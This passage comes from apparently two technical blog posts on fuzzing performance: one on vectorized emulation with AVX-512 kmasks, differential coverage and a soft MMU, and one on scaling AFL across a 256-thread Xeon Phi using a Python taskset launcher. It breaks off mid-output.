Let’s knock out the first one real quick, loads and stores with different addresses. For all memory accesses we do a very quick horizontal comparison of all the lanes first. If they have the same address then we take a fast path and issue a single vmovdqa32. If their addresses differ then we simply perform 16 individual memory operations and emulate the behavior we desire. It technically can get a bit better as AVX-512 has scatter/gather instructions which allow the CPU to do this loading/storing to different addresses for us. This is done with a base and an offset; with 32 bits it’s not possible to address the whole address space we need. However with 64-bit vectorization (8 64-bit VMs) we can leverage scatter/gather instructions to their fullest and all loads and stores just become a fast path with one vmovdqa32, or a slow (but fast) path where we use a single scatter/gather instruction.
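As a scalar sketch of that fast-path check (the real thing is a vectorized horizontal compare against VM #0’s address; names here are made up):

/// Returns true if every currently-executing VM computed the same address,
/// in which case a single vectorized load/store services all of them
fn addresses_converged(addrs: &[u32; 16], kmask: u16) -> bool {
    // VM #0 is never disabled, so its address is the reference
    let reference = addrs[0];
    (0..16usize)
        .filter(|&lane| (kmask >> lane) & 1 != 0)
        .all(|lane| addrs[lane] == reference)
}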

Branches

We’ve avoided this until now for a reason. It’s the single hardest thing in vectorized emulation. How can we possibly run 16 VMs at a time if one branches to another location? Now we cannot run an AVX-512 instruction as it would be invalid for the VMs which have gone down a different path.

Well it turns out this isn’t a terribly hard problem on AVX-512. And when I say AVX-512 I mean specifically AVX-512. Feel free to ponder why this might be based on what you’ve learned is unique to AVX-512.

Okay it’s kmasks. Did you get it right? Well kmasks save our lives. Remember the merging kmasks we talked about which would disable updates to a given lane of a vector and ignore writes to a given lane if it is not enabled in the kmask?

Well by using a kmask register on all JITted AVX-512 instructions we can simply change the kmask to disable updates on a given VM.

What this allows us to do is start execution at the same location on all 16 VMs as they start with the same EIP. On all branches we will horizontally compare the branch targets and compute a new kmask value to use when we continue execution on the new branch.

AVX-512 doesn’t have a great way of extracting or broadcasting arbitrary elements of a vector. However it has a fast way to broadcast the 0th lane in a vector ala vpbroadcastd zmm0, xmm0. This takes the first lane from xmm0 and broadcasts it to all 16 lanes in zmm0. We actually never stop following VM #0. This means VM #0 is always executing, which is important for all of the horizontal compares that we talk about. When I say horizontal compare I mean a broadcast of VM #0’s value and a compare with all other VMs.

Let’s look in-detail at the entire JIT that I use for conditional indirect branches:

; IL operation is Beqz(val, true_target, false_target)
;
; val          - 16 32-bit values to conditionally branch by
; true_target  - 16 32-bit guest branch target addresses if val == 0
; false_target - 16 32-bit guest branch target addresses if val != 0
;
; IL pseudocode:
;
; if val == 0 {
;    goto true_target;
; } else {
;    goto false_target;
; }
;
; Register usage
; k1    - The execution kmask, this is the kmask used on all JITted instructions
; k2    - Temporary kmask, just used for scratch
; val   - Dynamically allocated zmm register containing val
; ttgt  - Dynamically allocated zmm register containing true_target
; ftgt  - Dynamically allocated zmm register containing false_target
; zmm0  - Scratch register
; zmm31 - Desired branch target for all lanes

; Compute a kmask `k2` which contains `1`s for the corresponding lanes
; for VMs which are enabled by `k1` and also have a non-zero value.
; TL;DR: k2 contains a mask of VMs which will be taking `ftgt`
vptestmd k2 {k1}, val, val

; Store the true branch target unconditionally, while not clobbering
; VMs which have been disabled
vmovdqa32 zmm31 {k1}, ttgt

; Store the false branch target for VMs not taking the branch
; Note the use of k2
vmovdqa32 zmm31 {k2}, ftgt

; At this point `zmm31` contains the targets for all VMs. Including ones
; that previously got disabled.

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask of which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

; ...
; Now just rip out the target for VM #0 and translate the guest address
; into the host JIT address and jump there.
; Or break out and generate the JIT if it hasn't been hit before

The above code is quite fast and isn’t a huge performance issue, especially as we’re running 16 VMs at a time and branches are “rare” with respect to expensive operations like memory loads and stores.

One thing that is important to note is that zmm31 always contains the last desired branch target for a given VM. Even after it has been disabled. This means that it is possible for a VM which has been disabled to come back online if VM #0 ends up going to the same location.

Let’s go through a more thorough example:

; Register allocation:
; ebx - Pointer to some user controlled buffer
; ecx - Length of controlled buffer

; Validate buffer size
cmp ecx, 4
jne .end

; Fallthrough
.next:

; Check some magic from the buffer
cmp dword ptr [ebx], 0x13371337
jne .end

; Fallthrough
.next2:

; Unconditionally jump to .end, for clarity
jmp .end

.end:

And the theoretical vectorized output (not actual JIT output):

; Register allocation:
; zmm10 - ebx
; zmm11 - ecx
; k1    - The execution kmask, this is the kmask used on all JITted instructions
; k2    - Temporary kmask, just used for scratch
; zmm0  - Scratch register
; zmm8  - Scratch register
; zmm31 - Desired branch target for all lanes

; Compute kmask register for VMs which have `ecx` == 4
vpcmpeqd k2 {k1}, zmm11, dword ptr [memory containing 4] {1to16}

; Update zmm31 to reference the respective branch target
vmovdqa32 zmm31 {k1}, address of .end  ; By default we go to end
vmovdqa32 zmm31 {k2}, address of .next ; If `ecx` == 4, go to .next

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

; Branch to where VM #0 is going (simplified)
jmp where_vm0_wants_to_go

.next:

; Magically load memory at ebx (zmm10) into zmm8
vmovdqa32 zmm8, complex_mmu_operation_and_stuff

; Compute kmask register for VMs which have packet contents 0x13371337
vpcmpeqd k2 {k1}, zmm8, dword ptr [memory containing 0x13371337] {1to16}

; Go to .next2 if memory is 0x13371337, else go to .end
vmovdqa32 zmm31 {k1}, address of .end   ; By default we go to end
vmovdqa32 zmm31 {k2}, address of .next2 ; If contents == 0x13371337 .next2

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

; Branch to where VM #0 is going (simplified)
jmp where_vm0_wants_to_go

.next2:

; Everyone still executing is unconditionally going to .end
vmovdqa32 zmm31 {k1}, address of .end

; Broadcast the target that VM #0 wants to take to all lanes in `zmm0`
vpbroadcastd zmm0, xmm31

; Compute a new kmask which represents all VMs which are going to
; the same location as VM #0
vpcmpeqd k1, zmm0, zmm31

.end:

Okay so what does the VM state look like for a theoretical version (simplified to 4 VMs):

Starting state, all VMs enabled with different memory contents (pointed to by ebx) and different packet lengths:

Register   VM 0         VM 1         VM 2         VM 3
ecx        4            3            4            4
memory     0x13371337   0x13371337   3            0x13371337
k1         1            1            1            1

First branch, all VMs with ecx != 4 are disabled and are pending branches to .end, VM #1 falls off

Register   VM 0         VM 1         VM 2         VM 3
ecx        4            3            4            4
memory     0x13371337   0x13371337   3            0x13371337
k1         1            0            1            1
zmm31      .next        .end         .next        .next

Second branch, VMs without 0x13371337 in memory are pending branches to .end, VM #2 falls off

Register   VM 0         VM 1         VM 2         VM 3
ecx        4            3            4            4
memory     0x13371337   0x13371337   3            0x13371337
k1         1            0            0            1
zmm31      .next2       .end         .end         .next2

Final branch, everyone ends up at .end, all VMs are enabled again as they’re following VM #0 to .end

Register   VM 0         VM 1         VM 2         VM 3
ecx        4            3            4            4
memory     0x13371337   0x13371337   3            0x13371337
k1         1            1            1            1
zmm31      .end         .end         .end         .end

Branch summary

So we saw that branches will disable VMs which do not follow VM #0. When VMs are disabled, all modifications to their register or memory state are blocked by hardware. The kmask mechanism allows us to keep performance up without needing different JITs for different branch states.

Further, VMs can come back online if they were pending to go to a location which VM #0 eventually ends up going to.
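
To make the mechanics concrete, here is a minimal Python sketch of this follow-the-leader model (just the bookkeeping, not the actual JIT): each lane has a pending branch target, and the enable mask is recomputed at every branch by comparing each lane’s pending target against VM #0’s.

# Minimal model of the follow-VM-#0 branch logic; not the real JIT.
# pending[i] is the guest address lane i wants to branch to. Disabled
# lanes keep their last pending target, just like zmm31 does.
def follow_vm0(pending):
    leader = pending[0]                       # VM #0 is always followed
    kmask  = [int(t == leader) for t in pending]
    return leader, kmask

# Walking the 4-VM example above:
_, k1 = follow_vm0([".next", ".end", ".next", ".next"])    # k1 = [1, 0, 1, 1]
_, k1 = follow_vm0([".next2", ".end", ".end", ".next2"])   # k1 = [1, 0, 0, 1]
_, k1 = follow_vm0([".end", ".end", ".end", ".end"])       # k1 = [1, 1, 1, 1], lanes return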

Exceptions/faults

These are really just glorified branches with a VM exit to save the input and memory/register state related to the crash. No reason to really go in depth here.



Okay but why?

Okay we’ve covered all the very high level details of how vectorized emulation is possible but that’s just academic thought. It’s pointless unless it accomplishes something.

At this point all of the next topics are going to be their own blogs and thus are only lightly touched on here.

Differential coverage / Hardware accelerated taint tracking

Differential coverage is a special type of coverage that we are able to gather with this vectorized emulation model. This is the most important aspect of all of this tooling and is the main reason it is worth doing.

Since we are running 16 VMs at a time we are able to very cheaply (a few cycles) do a horizontal comparison with other VMs. Since VMs are deterministic and only have differing user-controlled inputs any situation where VMs have different branches, different register states, different memory states, etc is when the user input directly or indirectly caused a change in behavior.

I would consider this to be the holy grail of coverage. Any effect the input has on program state we can easily and cheaply detect.
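
As a rough sketch of the idea (plain Python, not the vectorized implementation): detecting input-influenced state is just a lane-wise comparison against VM #0, and any differing lane marks the current instruction as interesting.

# Sketch: since all lanes run the same deterministic code and differ only
# in their inputs, any lane whose value differs from VM #0's value was
# influenced (directly or indirectly) by the input.
def diverging_lanes(lane_values):
    leader = lane_values[0]
    return [i for i, v in enumerate(lane_values) if v != leader]

reg = [5] * 16       # some register across 16 lanes after an instruction
reg[3] = 7           # lane 3 computed something different
print(diverging_lanes(reg))   # [3] -> record coverage/state for this instruction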

How differential coverage combats state explosion

If we wanted to track all register states for all instructions the state explosion would be way too huge. This can be somewhat capped by limiting the amount of state each instruction can generate. For example instead of storing all unique register values for an instruction we could simply store the minimums and maximums, or store up to n unique values, etc. However even when limited to just a few values per instruction, the state explosion is too large for any real application.

However, since most memory and register states are not influenced by user input, with differential coverage we can greatly reduce the number of instructions for which state is stored, as we only store state that was influenced by user data.

This works for code coverage as well. For example, if we hit a printf with completely uncontrolled parameters, that would register as potentially hundreds of new blocks of coverage. With differential coverage all of this state can be ignored.

How differential coverage is great for performance

While the focus of this tool is not performance, updating coverage databases on every instruction would not be feasible. By filtering to only instructions which have user-influenced data, we’re able to perform much more complex operations in the cases where new coverage was detected.

For example all of my register loads and stores start with a horizontal compare and a quick jump out if they all match. If one differs it’s a rare enough occasion that it’s feasible to spend a few more cycles to do a hash calculation based on state and insertion into the global input and coverage databases. Without differential coverage I would have to unconditionally do this every instruction.

Soft MMU

Since the soft MMU deserves a blog entirely on its own, we’ll just go slightly into the details.

As mentioned before, we interleave memory at the dword level, but for every byte there is also a corresponding permission byte. In memory this looks like 16 32-bit dwords representing the permissions, followed by 16 32-bit dwords containing their corresponding memory contents. This allows me to read a 64-byte cache line with the permissions, which are checked first, followed by the directly adjacent 64-byte cache line with the contents.
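
As a sketch of that layout (hypothetical helper names; the actual address translation is a topic for the MMU post), the host offsets of the permission and content dwords for a given guest dword and lane would look roughly like this:

# Rough model of the interleaved layout described above: for each guest
# dword there is one 64-byte line of permissions (16 lanes x 4 bytes)
# immediately followed by one 64-byte line of contents.
LANES     = 16
LINE_SIZE = LANES * 4    # 64 bytes, one cache line

def host_offsets(guest_addr, lane):
    """Offsets of the permission dword and content dword for one lane.
    Assumes guest_addr is dword-aligned and lane is in 0..15."""
    dword_index = guest_addr // 4
    base        = dword_index * 2 * LINE_SIZE   # perms line + contents line
    perm_off    = base + lane * 4
    data_off    = base + LINE_SIZE + lane * 4
    return perm_off, data_off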

For permissions: the read, write, and execute bits are completely separate. This allows more exotic memory models like execute-only memory.

Since permissions are at the byte level, this means we can punch a one-byte hole anywhere in memory and accessing that byte would cause a fault. For some targets I’ll do special modifications to permissions and punch holes in unused or padding fields of structures to catch overflows of buffers contained inside structures.

Further I have a special read-after-write (RaW) bit, which is used to mark memory as uninitialized. Memory returned from allocators is marked as RaW and thus will fault if ever read before written to. This is tracked at the byte level and is one of the most useful features of the MMU. We’ll talk about how this can be made fast in a subsequent blog.
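
A toy model of those byte-level permissions, including the RaW bit (illustrating the semantics only; the fast vectorized version is covered in the future MMU post), might look like:

# Toy byte-level permission model; not the vectorized implementation.
PERM_READ, PERM_WRITE, PERM_EXEC, PERM_RAW = 1, 2, 4, 8

class SoftMem:
    def __init__(self, size):
        self.data  = bytearray(size)
        self.perms = bytearray(size)   # one permission byte per data byte

    def alloc(self, addr, size):
        # Fresh allocations are writable but read-after-write: they must
        # be written before they can be read.
        for a in range(addr, addr + size):
            self.perms[a] = PERM_WRITE | PERM_RAW

    def write_byte(self, addr, value):
        if not self.perms[addr] & PERM_WRITE:
            raise RuntimeError("write fault at %#x" % addr)
        self.data[addr] = value
        if self.perms[addr] & PERM_RAW:
            # The first write makes the byte readable
            self.perms[addr] = (self.perms[addr] & ~PERM_RAW) | PERM_READ

    def read_byte(self, addr):
        if not self.perms[addr] & PERM_READ:
            raise RuntimeError("read fault at %#x (uninitialized?)" % addr)
        return self.data[addr]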

Performance

Performance is not the goal of this project, however the numbers are a bit better than expected from the theorycrafting.

In reality it’s possible to hit up to 2 trillion emulated instructions per second, which is the clickbait title of this blog. However this is on a 32-deep unrolled loop that is just adding numbers and not hitting memory. This unrolling makes the branch divergence checking costs disappear, and integer operations are almost a 1-to-1 translation into AVX-512 instructions.

For real targets the numbers are more in the 40 billion to 120 billion emulated instructions per second range. For example, on OpenBSD’s DHCP client I’m able to do just over 5 million fuzz cases per second (a fuzz case is one DHCP transaction, typically 1 or 2 packets). For this specific target the emulation speed is 54 billion instructions per second. This is while gathering PC-level coverage and all register and memory divergence coverage.

So it’s just academic?

I’ve been working on this tooling for almost 2 years now and it’s been usable since month 3. It’s my primary tool for fuzzing and has successfully found bugs in various targets. Sadly most of these bugs are not public yet, but soon.

This tool was used to find a remote bluescreen in Windows Firewall: CVE-2018-8206 (okay technically I found it first manually, but was able to find it with the fuzzer with a byte flipper even though it has much more complex constraints)

It was also used to find a theoretical OOB in OpenBSD’s dhclient: dhclient bug. This is a fun one, as really no traditional fuzzer would find this since it’s an out-of-bounds by 1 inside of a structure.

Future blogs

  • Description of the IL used, as it’s got some specific designs for vectorized emulation

  • Internal details of the MMU implementation

  • Showing the power of differential coverage by looking at a real example of fuzzing an HTTP parser and having a byte flipper quickly (under 5 seconds) find the basic "VERB HTTP/number.number\r\n". No magic, no `strings` feedback, no static analysis. Just a useless fuzzer with strong harnessing.

  • Talk about the new IL which handles graphs and can do cross-block optimizations

  • Showing better branch divergence handling via post-dominator analysis and stepping VMs until they sync up at a known future merge point

Scaling AFL to a 256 thread machine

16 September 2018 at 22:51

That's a lot of cores

Changelog

Date         Info
2018-09-16   Initial
2018-09-16   Changed custom JPEG test program a little, saves 2 syscalls bringing us from 9 per fuzz case to 7 per fuzz case. Used -O2 flag to build. Neither of these had a noticeable impact on performance thus performance numbers were not updated.

Performance disclaimer

Performance is critical to my work and I’ve been researching fuzzer performance and scaling specifically for the past 5 years. It’s important that the performance numbers here are accurate and use the tooling to its fullest. Please let me know of any suggestions to make these numbers better while still using unmodified AFL. I was also using a stock libjpeg-turbo, as I do not want to make internal modifications that would increase the risk of invalid results.

The machine this testing was done on is a single-socket Intel Xeon Phi 7210, a 64-core, 256-thread machine (yes, 4 HW threads per core). It is clocked at 1.3 GHz and the cores are effectively Atom cores, making them much weaker than conventional ones. A single 1.3 GHz Phi core here usually runs identical code about 10-20x slower than a conventional modern Xeon at 2.8 GHz. This means that numbers here might seem unreasonably low compared to what you may expect, but it’s because these are weak cores.

Intro

I’ve been trying to get AFL to scale correctly for the past day, which turns out to be fairly hard. AFL doesn’t really provide any built-in way of just spinning up multiple cores with something like afl-fuzz -j64 ..., so we have to do it ourselves. Further, the machine I’m trying this on is quite exotic and not much scales correctly to it anyways. But let’s hop right on in and give it a go! This testing is actually being done for an upcoming blog series demonstrating a neat new way of fuzzing and harnessing that I call “Vectorized Emulation”. I wanted to get the best performance numbers out of AFL so I had a reasonable comparison that would make some of the tech a bit more relatable. Stay tuned for that post hopefully within a week!

In this blog I’m going to talk about the major things to keep an eye on when you’re trying to get every drop of performance:

  • Are you using all your cores?
  • Are you scaling well?
  • Are you spending time in your actual target or other things like the kernel?

If you’re just spinning up one process per core, it’s very possible that all of these are not true. We’ll go through a real example of this process and how easy it is to fall into a trap of not effectively using your cores.

Target selection

First of all, we need a good target that we can try to fuzz as fast as possible. Something that is common, reasonably small, and easy to convert to use AFL persistent mode. I’ve decided to look at libjpeg-turbo as it’s a common target, many people are probably already familiar, and it’s quite simple to just throw in a loop. Further if we found a bug it’d be a pretty good day, so it’s always fun to play with real targets.

Fuzzing out of the can

The first thing I’m going to try on almost any new target I look at will be to find a tool that already comes with the source and in some way parses the image. In this case for libjpeg-turbo we can use the djpeg tool that it ships with. This is a simple command line utility that takes in a file over stdin or via a command line argument, and produces another output file, potentially of another format. Since we know we are going to use AFL, let’s get a basic AFL environment set up. It’s pretty simple, and in our case we’re using afl-2.52b, the latest at the time of writing this blog. We’re not using ASAN as we’re looking for best case performance numbers.

pleb@debphi:~/blogging$ wget http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
--2018-09-16 16:09:11--  http://lcamtuf.coredump.cx/afl/releases/afl-latest.tgz
Resolving lcamtuf.coredump.cx (lcamtuf.coredump.cx)... 199.58.85.40
Connecting to lcamtuf.coredump.cx (lcamtuf.coredump.cx)|199.58.85.40|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 835907 (816K) [application/x-gzip]
Saving to: ‘afl-latest.tgz’

afl-latest.tgz                                              100%[========================================================================================================================================>] 816.32K   323KB/s    in 2.5s

2018-09-16 16:09:14 (323 KB/s) - ‘afl-latest.tgz’ saved [835907/835907]

pleb@debphi:~/blogging$ tar xf afl-latest.tgz
pleb@debphi:~/blogging$ cd afl-2.52b/
pleb@debphi:~/blogging/afl-2.52b$ make -j256
[*] Checking for the ability to compile x86 code...
[+] Everything seems to be working, ready to compile.
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-gcc.c -o afl-gcc -ldl
set -e; for i in afl-g++ afl-clang afl-clang++; do ln -sf afl-gcc $i; done
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-fuzz.c -o afl-fuzz -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-showmap.c -o afl-showmap -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-tmin.c -o afl-tmin -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-gotcpu.c -o afl-gotcpu -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-analyze.c -o afl-analyze -ldl
cc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" afl-as.c -o afl-as -ldl
ln -sf afl-as as
[*] Testing the CC wrapper and instrumentation output...
unset AFL_USE_ASAN AFL_USE_MSAN; AFL_QUIET=1 AFL_INST_RATIO=100 AFL_PATH=. ./afl-gcc -O3 -funroll-loops -Wall -D_FORTIFY_SOURCE=2 -g -Wno-pointer-sign -DAFL_PATH=\"/usr/local/lib/afl\" -DDOC_PATH=\"/usr/local/share/doc/afl\" -DBIN_PATH=\"/usr/local/bin\" test-instr.c -o test-instr -ldl
echo 0 | ./afl-showmap -m none -q -o .test-instr0 ./test-instr
echo 1 | ./afl-showmap -m none -q -o .test-instr1 ./test-instr
[+] All right, the instrumentation seems to be working!
[+] LLVM users: see llvm_mode/README.llvm for a faster alternative to afl-gcc.
[+] All done! Be sure to review README - it's pretty short and useful.

Out of the box AFL gives us some compiler wrappers for gcc and clang, afl-gcc and afl-clang respectively. We’ll use these to build the libjpeg-turbo source so AFL adds the instrumentation that is used for coverage and feedback, which is critical to modern fuzzer operation, especially when just doing byte flipping like AFL does.

Let’s grab libjpeg-turbo and build it:

pleb@debphi:~/blogging$ git clone https://github.com/libjpeg-turbo/libjpeg-turbo
Cloning into 'libjpeg-turbo'...
remote: Counting objects: 13559, done.
remote: Compressing objects: 100% (40/40), done.
remote: Total 13559 (delta 14), reused 8 (delta 1), pack-reused 13518
Receiving objects: 100% (13559/13559), 11.67 MiB | 8.72 MiB/s, done.
Resolving deltas: 100% (10090/10090), done.
pleb@debphi:~/blogging$ mkdir buildjpeg
pleb@debphi:~/blogging$ cd buildjpeg/
pleb@debphi:~/blogging/buildjpeg$ export PATH=$PATH:/home/pleb/blogging/afl-2.52b
pleb@debphi:~/blogging/buildjpeg$ cmake -G"Unix Makefiles" -DCMAKE_C_COMPILER=afl-gcc -DCMAKE_C_FLAGS=-m32 /home/pleb/blogging/libjpeg-turbo/
...
pleb@debphi:~/blogging/buildjpeg$ make -j256
...
[100%] Built target tjunittest-static
pleb@debphi:~/blogging/buildjpeg$ ls
cjpeg           CMakeFiles             CTestTestfile.cmake  jconfig.h     jpegtran         libjpeg.map    libjpeg.so.62.3.0  libturbojpeg.so.0      md5         sharedlib  tjbench-static  tjexampletest      wrjpgcom
cjpeg-static    cmake_install.cmake    djpeg                jconfigint.h  jpegtran-static  libjpeg.so     libturbojpeg.a     libturbojpeg.so.0.2.0  pkgscripts  simd       tjbenchtest     tjunittest
CMakeCache.txt  cmake_uninstall.cmake  djpeg-static         jcstest       libjpeg.a        libjpeg.so.62  libturbojpeg.so    Makefile               rdjpgcom    tjbench    tjexample       tjunittest-static

Woo! We have libjpeg-turbo built with AFL instrumentation! We now have a ./djpeg which is what we’re going to use to fuzz. We need a test input corpus of JPEGs; however, since we’re benchmarking, I just picked a single JPEG that is 3.2 KiB in size. We’ll set up AFL and fuzz this with no frills:

pleb@debphi:~/blogging$ mkdir fuzzing
pleb@debphi:~/blogging$ cd fuzzing/
pleb@debphi:~/blogging/fuzzing$ mkdir inputs
... Copy in an input
pleb@debphi:~/blogging/fuzzing$ mkdir outputs
pleb@debphi:~/blogging/fuzzing$ afl-fuzz -h
pleb@debphi:~/blogging/fuzzing$ afl-fuzz -i inputs/ -o outputs/ -- ../buildjpeg/djpeg @@

Now we’re hacking!

Oh wow we're a hacker

It’s important that you keep an eye on exec speed as it can flutter around during different passes; in this case 210-220 is where it seemed to hover on average. So I’ll be using the 214.4 number from the picture as the baseline for this first test.

Using all your cores

I’ve got some sad news though. This isn’t using anything but a single core. We have a 256-thread machine and we’re using 1/256th of it to fuzz, what a waste of silicon. Sadly there’s no trivial way to spin up AFL on multiple cores, so let’s just cheat and grab something that does it for us: afl-launch. This requires Go, but the instructions are pretty clear on how to get it set up and running. It takes effectively the exact same args as afl-fuzz, but adds an -n parameter that spins up multiple jobs for us. Let’s also switch to a ramdisk to decrease thrashing of the disk (doesn’t matter that much anyways due to FS caching):

pleb@debphi:~/blogging/fuzzing$ rm -rf /mnt/ram/outputs/*
pleb@debphi:~/blogging/fuzzing$ ~/go/bin/afl-launch -n 256 -i /mnt/ram/inputs/ -o /mnt/ram/outputs/ -- ../buildjpeg/djpeg @@

And we expect roughly 214 * 64 (number of exec/sec on single core * number of physical cores) = 14k execs/sec. In reality I expect even more than this due to hyperthreading.

pleb@debphi:~/blogging/fuzzing$ ps a | grep afl-fuzz | grep -v grep | wc -l
256
pleb@debphi:~/blogging/fuzzing$ afl-whatsup -s /mnt/ram/outputs/
status check tool for afl-fuzz by <[email protected]>

Summary stats
=============

       Fuzzers alive : 256
      Total run time : 0 days, 10 hours
         Total execs : 0 million
    Cumulative speed : 4108 execs/sec
       Pending paths : 455 faves, 14932 total
  Pending per fuzzer : 1 faves, 58 total (on average)
       Crashes found : 0 locally unique

Hmm? What? I’m running 256 instances, afl-whatsup confirms that, but I’m only getting 4.1k execs/sec? That’s a 20x speedup running 256 threads!? Hmm, this is no good. We even switched to a ramdisk so we even have an advantage over the single threaded run. Let’s check out that CPU utilization:

Wait what

Actually using all your cores

Okay, so apparently we’re only using 22 threads even though we have 256 processes running. Linux will evenly distribute threads so AFL must be doing something special here. If we just look around for affinity in the AFL codebase we stumble across this:

/* Build a list of processes bound to specific cores. Returns -1 if nothing
   can be found. Assumes an upper bound of 4k CPUs. */

static void bind_to_free_cpu(void) {

  DIR* d;
  struct dirent* de;
  cpu_set_t c;

  u8 cpu_used[4096] = { 0 };
  u32 i;

  if (cpu_core_count < 2) return;

  if (getenv("AFL_NO_AFFINITY")) {

    WARNF("Not binding to a CPU core (AFL_NO_AFFINITY set).");
    return;

  }

  d = opendir("/proc");

  if (!d) {

    WARNF("Unable to access /proc - can't scan for free CPU cores.");
    return;

  }

  ACTF("Checking CPU core loadout...");

  /* Introduce some jitter, in case multiple AFL tasks are doing the same
     thing at the same time... */

  usleep(R(1000) * 250);

  /* Scan all /proc/<pid>/status entries, checking for Cpus_allowed_list.
     Flag all processes bound to a specific CPU using cpu_used[]. This will
     fail for some exotic binding setups, but is likely good enough in almost
     all real-world use cases. */

  while ((de = readdir(d))) {

    u8* fn;
    FILE* f;
    u8 tmp[MAX_LINE];
    u8 has_vmsize = 0;

    if (!isdigit(de->d_name[0])) continue;

    fn = alloc_printf("/proc/%s/status", de->d_name);

    if (!(f = fopen(fn, "r"))) {
      ck_free(fn);
      continue;
    }

    while (fgets(tmp, MAX_LINE, f)) {

      u32 hval;

      /* Processes without VmSize are probably kernel tasks. */

      if (!strncmp(tmp, "VmSize:\t", 8)) has_vmsize = 1;

      if (!strncmp(tmp, "Cpus_allowed_list:\t", 19) &&
          !strchr(tmp, '-') && !strchr(tmp, ',') &&
          sscanf(tmp + 19, "%u", &hval) == 1 && hval < sizeof(cpu_used) &&
          has_vmsize) {

        cpu_used[hval] = 1;
        break;

      }

    }

    ck_free(fn);
    fclose(f);

  }

  closedir(d);

  for (i = 0; i < cpu_core_count; i++) if (!cpu_used[i]) break;

  if (i == cpu_core_count) {

    SAYF("\n" cLRD "[-] " cRST
         "Uh-oh, looks like all %u CPU cores on your system are allocated to\n"
         "    other instances of afl-fuzz (or similar CPU-locked tasks). Starting\n"
         "    another fuzzer on this machine is probably a bad plan, but if you are\n"
         "    absolutely sure, you can set AFL_NO_AFFINITY and try again.\n",
         cpu_core_count);

    FATAL("No more free CPU cores");

  }

  OKF("Found a free CPU core, binding to #%u.", i);

  cpu_aff = i;

  CPU_ZERO(&c);
  CPU_SET(i, &c);

  if (sched_setaffinity(0, sizeof(c), &c))
    PFATAL("sched_setaffinity failed");

}

#endif /* HAVE_AFFINITY */

We can see that this code does some interesting processing on procfs to find which processors are not in use, and then pins to them. Interestingly we never get the “Uh-oh” message saying we’re out of CPUs, and all 256 of our instances are running. The only way this is possible is if AFL is binding multiple processes to the same core. This is possible due to races on the procfs and the CPU masks not getting updated right away, so some delay has to be added between spinning up AFL instances. But we can do better.

We see at the top of this function that this functionality can be turned off entirely by setting the AFL_NO_AFFINITY environment variable. Let’s do that and then manage the affinities ourselves. We’re also going to drop the afl-launch tool and just do it ourselves.

import subprocess, threading, time, shutil, os

NUM_CPUS = 256

INPUT_DIR  = "/mnt/ram/jpegs"
OUTPUT_DIR = "/mnt/ram/outputs"

def do_work(cpu):
    master_arg = "-M"
    if cpu != 0:
        master_arg = "-S"

    # Restart if it dies, which happens on startup a bit
    while True:
        try:
            sp = subprocess.Popen([
                "taskset", "-c", "%d" % cpu,
                "afl-fuzz", "-i", INPUT_DIR, "-o", OUTPUT_DIR,
                master_arg, "fuzzer%d" % cpu, "--",
                "../buildjpeg/djpeg", "@@"],
                stdout=subprocess.PIPE, stderr=subprocess.PIPE)
            sp.wait()
        except:
            pass

        print("CPU %d afl-fuzz instance died" % cpu)

        # Some backoff if we fail to run
        time.sleep(1.0)

assert os.path.exists(INPUT_DIR), "Invalid input directory"

if os.path.exists(OUTPUT_DIR):
    print("Deleting old output directory")
    shutil.rmtree(OUTPUT_DIR)

print("Creating output directory")
os.mkdir(OUTPUT_DIR)

# Disable AFL affinity as we do it better
os.environ["AFL_NO_AFFINITY"] = "1"

for cpu in range(0, NUM_CPUS):
    threading.Timer(0.0, do_work, args=[cpu]).start()

    # Let master stabilize first
    if cpu == 0:
        time.sleep(1.0)

while threading.active_count() > 1:
    time.sleep(5.0)

    try:
        subprocess.check_call(["afl-whatsup", "-s", OUTPUT_DIR])
    except:
        pass

By using taskset when we spawn AFL processes we manually control the core, rather than AFL trying to figure out what is not being used; we know what’s not used since we’re launching everything. Further we set os.environ["AFL_NO_AFFINITY"] = "1" to make sure AFL doesn’t get control over affinity as we now manage it. We’ve got some other things in here: we give 1 second of delay after the master instance, we automatically clean up the output directory, and we call afl-whatsup in a loop. We also restart dead afl-fuzz instances, which I’ve observed can happen sometimes when spawning everything at once.

status check tool for afl-fuzz by <[email protected]>

Summary stats
=============

